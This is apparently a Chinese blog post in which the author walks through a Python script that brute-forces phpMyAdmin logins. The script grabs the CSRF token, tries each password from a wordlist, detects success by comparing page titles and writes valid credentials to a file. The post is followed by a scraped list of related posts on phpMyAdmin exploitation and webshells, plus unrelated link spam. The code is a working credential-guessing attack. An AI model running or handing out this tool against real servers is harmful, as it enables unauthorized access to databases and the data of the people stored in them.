爆破phpmyadmin

  • 因为是第一次写脚本,所以没有爆破phpmyadmin的思路
  • 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路
  • 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4cccba4055e
  • 思路逐渐开始清晰,通过定义url user passdic(密码字典) headers session token
  • 重复获取token以及获取的title的信息
  • 构造payload发送请求
  • 对登录前后title的信息进行比对re.findall
import html
import re
import requestsurl = 'http://url/index.php'user = 'root'passdic = '字典路径's = requests.session()
s.headers = {'Accept': '*/*','Accept-Encoding': 'gzip, deflate','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_token(text) -> str:token = re.findall("name=\"token\" value=\"(.*?)\" />", text)return html.unescape(token[0]) if token else None
def get_title(text) -> str:title = re.findall('<title>(.*)</title>', text)return title[0] if title else None
def try_login(user, pwd, token):data = {'pma_username': user,'pma_password': pwd,'server': 1,'target': 'index.php','token': token}r = s.post(url, data=data)return r.text
def fuck_pma():with open(passdic, 'r', encoding='utf-8') as f:html = try_login('', '', '')title_fail = get_title(html)token = get_token(html)for line in f:pwd = line.strip()print(f'[?] 尝试登陆  {user}  {pwd}  ')html = try_login(user, pwd, token)title = get_title(html)token = get_token(html)if title != title_fail:print(f'[√] 登陆成功  {title}')with open('success.txt', 'a', encoding='utf-8') as f:f.write(f'{url}  |  {user}  |  {pwd}\n')breakelse:print(f'[×] 登陆失败  {title}')
if __name__ == "__main__":try:fuck_pma()except Exception as e:print(e)

爆破phpmyadmin相关推荐

  1. phpMyAdmin 常见漏洞利用记录

    目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2. ...

  2. 勒索攻击猖獗,在云上如何应对这位“破坏分子”?

    2019独角兽企业重金招聘Python工程师标准>>> 借助比特币等数字货币的匿名性,勒索攻击在近年来快速兴起,给企业和个人带来了严重的威胁.阿里云安全中心发现,近期云上勒索攻击事件 ...

  3. ATTCK实战系列——红队实战(一)

    文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...

  4. vulnstack内网渗透环境靶场-1 大全

    一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...

  5. 未来取代微信的社交产品,或许是一个云服务的插件

    2021年,打开微信,几乎全是广告,有官方的,也有前朋友的.微信绑架了每一个用户,无论贵贱,打开微信,都必须看广告,实现了真正的人人平等. 微信拥有10亿用户,是真正的国民产品,虽然2021年的微信, ...

  6. phpmyadmin爆破脚本练习

    初学python不久 记录一下写脚本的过程 思路 过程 首先 是要对于phpadmin的账号密码进行爆破 先找个环境抓个包看看 了解到需要脚本中 准备 请求头 还需要获取到token 最好还能获取到标 ...

  7. 8.使用hydra对端口进行爆破

    如果对开启端口的服务不清楚,请看我之前写的文章:https://www.cnblogs.com/bmjoker/p/8833316.html 2018,网站的防护(sql,xss...)的安全保护也已 ...

  8. [网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含缺陷复现及防御措施(CVE-2018-12613)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文通过两个题目分享了DirBuster扫描目录.Fuzzy爆破指定路径名称,通 ...

  9. phpmyadmin安全预防

    头疼的安全 之前服务器总是本人黑,千疮百孔,只能一步步的去做一些安全防范,如何防范自然先从如何渗透开始. 文章及建议 前段时间看到了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号 ...

最新文章

  1. 锅都不敢背,凭什么让大家跟着你干?
  2. 通过pxe从网络启动安装Windows XP
  3. php如何抓取一行的内容,提取一行作为对象 - PHP 7 中文文档
  4. Redux初学者指南
  5. oracle:oracle学习案例(五):基础练习
  6. Eclipse调整tomcat内存大小
  7. down perm什么意思_没想到“羽绒服”竟叫down coat!为啥有个down?
  8. rust显卡要求 steam_Steam夏促游戏销量排行,Epic称暂时不要买地平线黎明时分,虚幻5引擎配置要求不高,热血无赖电影开拍,Steam夏促育碧专区...
  9. 二级计算机选择题知识点资源,计算机省二级选择题.txt
  10. 反向代理和负载均衡有何区别?
  11. KEIL下载程序失败系列问题
  12. 特征选择和特征提取,及其分类
  13. ElasticSearch索引模板(template)操作:创建、查询、修改、删除
  14. imu 里程计融合_视觉里程计IMU辅助GPS融合定位算法研究
  15. 三流Offer看薪资、二流的Offer看平台,一流的Offer看...
  16. Python 将汉字转为拼音
  17. Linux内核“问题门”——学习问题、经验集锦(持续更新中……)
  18. android 仿微信账单生成器手机版式,至尊版清理大师app
  19. Studio 3T无法连接MongoDB异常错误 解决方法
  20. 我的面试心得与总结:BAT、网易、蘑菇街

热门文章

  1. 【2021-07-31】港股打新网
  2. 最新网络安全工程师从入门到精通学习_网络安全入门
  3. 微信小程序实现水平+垂直滚动
  4. 【2023程序员必看】人工智能行业分析
  5. 解决winscp中普通用户无法上传、删除、移动文件
  6. 微软Azure AI Gallery 预测性维护案例
  7. OPJ2.1基本算法之枚举7217:猴子吃桃
  8. Flink相关异常解决
  9. win10美化工具全套详细解析
  10. 萌新安装mongodb